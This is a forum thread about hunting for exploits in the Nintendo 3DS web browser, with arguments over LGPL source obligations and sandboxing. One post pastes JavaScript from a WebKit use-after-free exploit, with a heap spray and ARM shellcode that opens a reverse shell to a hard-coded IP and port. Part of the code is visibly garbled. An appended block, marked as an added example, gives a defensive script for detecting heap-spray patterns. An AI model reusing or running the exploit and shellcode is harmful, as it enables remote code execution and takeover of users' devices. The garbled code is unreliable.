Hacking Internet Browser built on open source software.

LinkReincarnate

So if you look in your manual in the internet browser and select the last section you'll find that the internet browser (or at least components of it) is licensed as LGPL. One of the requirements of an LGPL license is that the source code must be made available. The manual says it is available on Nintendo's site but I can't seem to find it anywhere. This code may or may not have an exploitable weakness. (I know how to code but I am a newb at reverse engineering so I may be all wet on that point.) Anyone want to poke around on Nintendo's site to try and help me find it?
 

ccfreak2k

It's almost certainly for one or more libraries, like libcurl. These kinds of libraries have been around a long time and have a very wide deployment, thus making them very well-tested.

That is to say, the source code would be in one of the included libraries and not the actual browser itself.
 

Spoom

If it's anything like the Wii, it's probably a compact version of Opera. Opera is not open source, so the person above is probably right; the code is likely to open source networking components, which have been examined by thousands of developer eyes over a long period of time. Finding an exploitable weakness in them is not likely.
 

Dash_2

Spoom said:
If it's anything like the Wii, it's probably a compact version of Opera. Opera is not open source, so the person above is probably right; the code is likely to open source networking components, which have been examined by thousands of developer eyes over a long period of time. Finding an exploitable weakness in them is not likely.


Yeah, they ditched Opera...

They use the same browser as PSP and PS3..
 

Toad King

Harakiri23 said:
The OP is wrong, you don't need to release anything for L(Lesser) GPL - only for GPL based code
Not entirely correct. If you make changes to LGPL code, you have to make the changes available.
 

pachura

LinkReincarnate said:
Webkit huh? I know I saw an exploit for that just the other day... Probably sandboxed on the ds though

yup lots of them
http://www.google.com/search?rlz=1C1CHFX_e...webkit+exploits

Sorry to be pessimistic, but:

1. Usually, exploits work only for a specific OS, or at least for a specific CPU family (often, x86). Currently, no one even knows for sure what ARM sits there in 3DS...

2. The browser is probably sandboxed and operates in an isolated memory area. After all, no one would like a bug in the browser to crash the suspended game...

3. There's a big chance 3DS' CPU uses special ARM extensions to counter stack/buffer overflow attacks.
 

ccfreak2k

pachura said:
LinkReincarnate said:
Webkit huh? I know I saw an exploit for that just the other day... Probably sandboxed on the ds though

yup lots of them
http://www.google.com/search?rlz=1C1CHFX_e...webkit+exploits

3. There's a big chance 3DS' CPU uses special ARM extensions to counter stack/buffer overflow attacks.
Doubtful. The cost for adding that kind of thing to the hardware would be greater than the gain from thwarting such attacks. It's possible that the software may be hardened (here's some examples), but ARM, being embedded, isn't really security-oriented. I'm putting my money on exploits being given only specific contextual access to the hardware.
 

BlazerRazor

LinkReincarnate said:
So if you look in your manual in the internet browser and select the last section you'll find that the internet browser (or at least components of it) is licensed as LGPL. One of the requirements of an LGPL license is that the source code must be made available. The manual says it is available on Nintendo's site but I can't seem to find it anywhere. This code may or may not have an exploitable weakness. (I know how to code but I am a newb at reverse engineering so I may be all wet on that point.) Anyone want to poke around on Nintendo's site to try and help me find it?
That's a completely wrong statement. Libraries licensed under LGPL do NOT require other third parties to hand over their code.
That is why LGPL was made, to make developers able to use libraries, linking, without needing to share their code.

Source: http://en.wikipedia.org/wiki/GNU_General_P...d_derived_works http://www.gnu.org/copyleft/lesser.html

Also, your talk about weaknesses in code is also kinda invalid. The chance of exploitable holes is much slimmer when you consider it is released under LGPL -- people can freely view the code and identify holes. Also, it would be wise of Nintendo to run applications like the browser in some sort of "sandbox" environment, to make sure you can't exploit future holes.
 

Harakiri23

Toad King said:
Harakiri23 said:
The OP is wrong, you don't need to release anything for L(Lesser) GPL - only for GPL based code
Not entirely correct. If you make changes to LGPL code, you have to make the changes available.

That is just plain wrong, please do some research and learn about GPL vs LGPL - you can do what you want with LGPL code - no strings attached!
 

LinkReincarnate

Harakiri23 said:
Toad King said:
Harakiri23 said:
The OP is wrong, you don't need to release anything for L(Lesser) GPL - only for GPL based code
Not entirely correct. If you make changes to LGPL code, you have to make the changes available.

That is just plain wrong, please do some research and learn about GPL vs LGPL - you can do what you want with LGPL code - no strings attached!
For what it's worth Nintendo thinks that they have a requirement to host the code because they are. Whether that is really the case or whether someone at Nintendo f'ed up is irrelevant.
 

LinkReincarnate

pachura said:
LinkReincarnate said:
Webkit huh? I know I saw an exploit for that just the other day... Probably sandboxed on the ds though

yup lots of them
http://www.google.com/search?rlz=1C1CHFX_e...webkit+exploits

Sorry to be pessimistic, but:

1. Usually, exploits work only for a specific OS, or at least for a specific CPU family (often, x86). Currently, no one even knows for sure what ARM sits there in 3DS...

2. The browser is probably sandboxed and operates in an isolated memory area. After all, no one would like a bug in the browser to crash the suspended game...

3. There's a big chance 3DS' CPU uses special ARM extensions to counter stack/buffer overflow attacks.
It's a custom job that uses very large chunks of ARM 9. ARM 9 is in all kinds of Android phones and tablets. Any Android exploits for WebKit?
Yup. They even allow remote code execution. Will that work on the 3DS? Probably not, but it does give a general idea of where vulnerabilities may lie and the methodologies that should be used. BTW that exploit uses JavaScript. Here is the code for those who are interested.




function heap()
{

var id = document.getElementById("target");
var attribute = id.getAttributeNode('id');
nodes = attribute.childNodes;
document.body.removeChild(id);
attribute.removeChild(nodes[0]);
setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("\u0058\u0058")); };

var scode = unescape("\u0060\u0060");
var scode2 = unescape("\u5005\ue1a0");
var shell = unescape("\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\
\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");
shell += unescape("\uae08"); // Port = 2222
shell += unescape("\u000a\u0202"); // IP = 10.0.2.2
shell += unescape("\u2000\u2000"); // string terminate

do
{
scode += scode;
scode2 += scode2;

} while (scode.length250){
// alert("freeze");
nodes[0].textContent}

}

}, 0);
}
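
Added example, not part of the original post or of any project's code: a static heuristic a defender could run over page scripts to flag the heap-spray structure visible in the function above (a very large allocation loop, a long run of `\u` escapes, and a string that doubles itself). The thresholds, rule names and both sample strings are assumptions constructed for illustration; the suspicious sample uses filler escapes, not a payload.

```javascript
// Heuristic patterns (thresholds are assumptions chosen for this example).
const ESCAPE_RUN = /(?:\\u[0-9a-fA-F]{4}|%u[0-9a-fA-F]{4}){8,}/g; // 8+ consecutive 16-bit escapes
const SELF_DOUBLING = /\b([A-Za-z_$][\w$]*)\s*\+=\s*\1\b/g;        // x += x
const BIG_LOOP = /for\s*\([^;]*;\s*[\w$]+\s*<=?\s*(\d+)\s*;/g;    // for (...; i < N; ...)
const LOOP_THRESHOLD = 10000;

// Return one finding per pattern hit, with its offset in the source text.
function scanScript(source) {
  const findings = [];
  for (const m of source.matchAll(ESCAPE_RUN)) {
    const units = m[0].match(/(?:\\u|%u)/g).length; // number of 16-bit units in the run
    findings.push({ rule: "long-escape-run", units, offset: m.index });
  }
  for (const m of source.matchAll(SELF_DOUBLING)) {
    findings.push({ rule: "self-doubling-string", name: m[1], offset: m.index });
  }
  for (const m of source.matchAll(BIG_LOOP)) {
    const count = Number(m[1]);
    if (count >= LOOP_THRESHOLD) {
      findings.push({ rule: "large-allocation-loop", count, offset: m.index });
    }
  }
  return findings;
}

// Each rule alone is common in benign code; two or more distinct rules
// in one script is the combination worth an analyst's attention.
function verdict(source) {
  const rules = [...new Set(scanScript(source).map((f) => f.rule))].sort();
  return { score: rules.length, suspicious: rules.length >= 2, rules };
}

// Constructed sample: same structure as the posted function, filler escapes only.
const SPRAY_SAMPLE = [
  'for (var i = 0; i < 70000; i++) { var s = new String(unescape("\\u0058\\u0058")); }',
  'var block = unescape("' + "\\u4141".repeat(40) + '");',
  "do { block += block; } while (block.length < 0x1000);",
].join("\n");

// Constructed benign sample: one escape, a short loop, ordinary accumulation.
const BENIGN_SAMPLE = 'var label = "caf\\u00e9"; for (var i = 0; i < 10; i++) { total += i; }';

console.log(verdict(SPRAY_SAMPLE), verdict(BENIGN_SAMPLE));
```

Pattern matching on source text misses obfuscated or dynamically built scripts, so treat a hit as a triage signal rather than a classification.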


